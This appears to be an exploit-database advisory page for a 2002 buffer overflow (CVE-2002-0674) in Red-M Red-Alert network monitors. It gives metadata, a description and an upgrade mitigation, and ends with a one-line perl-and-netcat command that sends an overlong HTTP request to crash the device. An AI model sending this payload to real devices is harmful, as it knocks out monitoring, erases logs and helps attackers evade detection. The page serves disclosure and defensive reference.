header-logo
Suggest Exploit
vendor:
Red-Alert
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Red-Alert
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2002-0674
CPE: a:red-m:red-alert
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Problems in various abilities have been identified in the Red-M Red-Alert network monitors

A buffer overflow vulnerability exists in the Red-M Red-Alert network monitors due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an overly long string of characters to the affected device. This will cause the device to crash, eliminating logs, and potentially allowing the attacker to gain unauthorized access to the administrative interface or partially evade detection.

Mitigation:

Upgrade to the latest version of the Red-M Red-Alert network monitors.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9618/info

Problems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device.

$ perl -e 'print "a"x1230 . "\r\n\r\n"| nc <device ip> 80

Navigation

Suggest Exploit

Services By CQR